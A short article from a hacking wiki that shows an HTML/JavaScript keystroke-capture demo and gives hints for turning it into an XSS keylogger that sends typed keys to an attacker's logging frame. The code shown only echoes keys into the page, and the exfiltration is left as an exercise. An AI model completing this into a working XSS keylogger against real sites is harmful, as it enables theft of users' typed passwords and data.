XSS Key Logger

From From Zero To Root

Severity  : The severity of the content in this article is [2/5]
Difficulty  : The difficulty of the content in this article is [4/5]

This key logger should be hooked on the XSS Intraframe Logger/Sploiter. Some hints:

  1. Change document to the if's document.
  2. Instead of showing the keys, send them to the logger function.
  3. The rest should be similar to previously written code.

The following code was written by Redfern, modified by ciri: 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
  <style type="text/css">
      body{
        background-color:#FFF;
        font:normal 1em Arial;color:#000;
      }
      h2{
        font:bold 2em Arial;color:#000;
        margin:100px 0 0 0;
      }
      textarea{
        font:normal .9em Arial;
        color:#000;
        border-top:20px solid #000;
        border-left:1px dotted #000;
        border-bottom:1px dotted #000;
      }
      a:link,a:visited{
        text-decoration:underline
        font:bold 1em Arial;
        color:#000;
      }
      a:hover{
        color:#FF0000;
      }
  </style>
 </head>
 <body>
 <h2>Keylogger Demo</h2>
  Type some keys to see them echoed back to the below textarea.<br>
  <textarea id="showKeys" rows="10" cols="150"></textarea>
  <div id="blaat"></div>
</body>
<script language="javascript">
  if( document.captureEvents && Event.KEYUP )
    document.captureEvents( Event.KEYUP );
  document.onkeyup = whichButton;
  function whichButton(e) {
    e = e ? e : window.event;
    if(typeof(e.keyCode) == 'number')       e = e.keyCode;
    else if(typeof(e.which) == 'number')    e = e.which;
    else if(typeof(e.charCode) == 'number') e = e.charCode;
    else return;
    document.getElementById("blaat").innerHTML += String.fromCharCode(e);
}
</script>
</html>

TODO: add fully working example, or leave this as an open exercise ?

Retrieved from "http://www.virtuax.be/fztr/index.php?title=XSS_Key_Logger"